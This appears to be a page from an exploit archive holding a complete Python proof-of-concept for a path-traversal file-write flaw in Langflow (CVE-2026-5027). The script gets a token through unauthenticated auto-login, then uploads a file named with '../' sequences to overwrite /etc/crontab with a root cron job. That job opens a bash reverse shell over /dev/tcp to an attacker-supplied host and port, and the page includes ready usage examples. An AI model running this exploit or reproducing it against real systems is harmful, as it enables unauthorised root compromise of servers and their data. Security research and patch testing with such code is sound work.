5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
#!/usr/bin/env python3
"""
Langflow <= 1.8.4 - Arbitrary File Write to RCE via Path Traversal (CVE-2026-5027)

Description:
    The POST /api/v2/files endpoint does not sanitize the 'filename' parameter
    from the multipart form data, allowing an attacker to write files to arbitrary
    locations on the filesystem using path traversal sequences ('../').

    When Langflow runs with auto-login enabled (default configuration), this
    vulnerability is exploitable WITHOUT authentication. An unauthenticated
    attacker can write arbitrary files to the server, leading to Remote Code
    Execution via cron jobs, SSH authorized_keys, or webshells.

    The vulnerability exists in upload_user_file() which passes file.filename
    directly to LocalStorageService.save_file() without path sanitization.

Affected: Langflow <= 1.8.4 (and likely all prior versions)
Vendor: https://github.com/langflow-ai/langflow (50K+ stars)
Advisory: https://www.tenable.com/security/research/tra-2026-26
Impact: Unauthenticated Remote Code Execution (default config)
CVSS: 8.8 (HIGH) - AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-22 (Path Traversal)

Exploit Author: Yahia Hamza (https://yh.do)
"""

import warnings
warnings.filterwarnings("ignore")
import requests
import sys
import argparse
import time

BANNER = """
 ╔═══════════════════════════════════════════════════════════════╗
 ║   CVE-2026-5027 — Langflow Path Traversal to RCE            ║
 ║   Arbitrary File Write via POST /api/v2/files                ║
 ║                                                              ║
 ║   Affected: Langflow <= 1.8.4                                ║
 ║   Impact:   Unauthenticated RCE (default config)             ║
 ║   CVSS:     8.8 (HIGH)                                       ║
 ║                                                              ║
 ║   Exploit Author: Yahia Hamza (https://yh.do)                ║
 ╚═══════════════════════════════════════════════════════════════╝
"""


def get_token(target):
    """Get access token via auto-login (default config)."""
    try:
        r = requests.get(f"{target}/api/v1/auto_login", timeout=10, verify=False)
        if r.status_code == 200:
            token = r.json().get("access_token")
            if token:
                return token, "auto-login (unauthenticated)"
    except:
        pass
    return None, None


def login_with_creds(target, username, password):
    """Authenticate with credentials."""
    try:
        r = requests.post(f"{target}/api/v1/login", json={
            "username": username,
            "password": password,
        }, timeout=10, verify=False)
        if r.status_code == 200:
            return r.json().get("access_token"), "credentials"
    except:
        pass
    return None, None


def write_file(target, token, remote_path, content):
    """Write arbitrary content to a path on the server via path traversal."""
    headers = {"Authorization": f"Bearer {token}"}
    traversal = "../" * 9
    filename = traversal + remote_path.lstrip("/")

    files = {'file': (filename, content, 'application/octet-stream')}
    r = requests.post(f"{target}/api/v2/files", headers=headers, files=files,
                      timeout=15, verify=False)
    return r.status_code in (200, 201), r


def exploit(target, username=None, password=None, lhost=None, lport=None):
    """Full exploitation chain."""
    print(BANNER)
    target = target.rstrip('/')

    # Step 1: Obtain access token
    print("[*] Step 1: Obtaining access token...")
    if username and password:
        token, method = login_with_creds(target, username, password)
    else:
        token, method = get_token(target)

    if not token:
        print("[-] Authentication failed.")
        sys.exit(1)
    print(f"[+] Token obtained via {method}")
    print(f"    {token[:40]}...")

    # Step 2: Deploy payload via path traversal (single write to avoid filename dedup)
    if lhost and lport:
        print(f"\n[*] Step 2: Deploying reverse shell via path traversal...")
        cron = f"""SHELL=/bin/bash
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
* * * * * root /bin/bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'
"""
        ok, r = write_file(target, token, "/etc/crontab", cron.encode())

        if ok:
            resp = r.json()
            print(f"[+] Path traversal confirmed — file written outside storage directory")
            print(f"    Server path: {resp.get('path', '')}")
            print(f"[+] Cron job deployed to /etc/crontab")
            print(f"[+] Shell incoming on {lhost}:{lport} within 60 seconds")
        else:
            print(f"[-] Exploit failed: HTTP {r.status_code}")
            print(f"    {r.text[:200]}")
            sys.exit(1)
    else:
        print(f"\n[*] Step 2: Writing proof file via path traversal...")
        proof = f"CVE-2026-5027 | Langflow RCE | {time.strftime('%Y-%m-%d %H:%M:%S')}".encode()
        ok, r = write_file(target, token, "/tmp/CVE-2026-5027-proof.txt", proof)

        if ok:
            resp = r.json()
            print(f"[+] Path traversal confirmed — file written outside storage directory")
            print(f"    Server path: {resp.get('path', '')}")
            print(f"[+] Proof written to /tmp/CVE-2026-5027-proof.txt")
        else:
            print(f"[-] Exploit failed: HTTP {r.status_code}")
            sys.exit(1)

    # Summary
    print(f"\n{'='*65}")
    print(f" EXPLOIT COMPLETE")
    print(f"{'='*65}")
    print(f" Target:     {target}")
    print(f" CVE:        CVE-2026-5027")
    print(f" Auth:       {method}")
    print(f" Impact:     Arbitrary File Write → RCE as root")
    if lhost and lport:
        print(f" Shell:      {lhost}:{lport}")
    print(f"{'='*65}")


def main():
    parser = argparse.ArgumentParser(
        description="CVE-2026-5027 — Langflow Path Traversal to RCE",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""Examples:
  %(prog)s -t http://target:7860
  %(prog)s -t http://target:7860 -u admin -p password
  %(prog)s -t http://target:7860 --lhost 10.0.0.1 --lport 4444
""",
    )
    parser.add_argument("-t", "--target", required=True, help="Langflow URL")
    parser.add_argument("-u", "--username", help="Username (optional if auto-login enabled)")
    parser.add_argument("-p", "--password", help="Password")
    parser.add_argument("--lhost", help="Listener IP for reverse shell")
    parser.add_argument("--lport", type=int, help="Listener port for reverse shell")
    args = parser.parse_args()

    exploit(args.target, args.username, args.password, args.lhost, args.lport)


if __name__ == "__main__":
    main()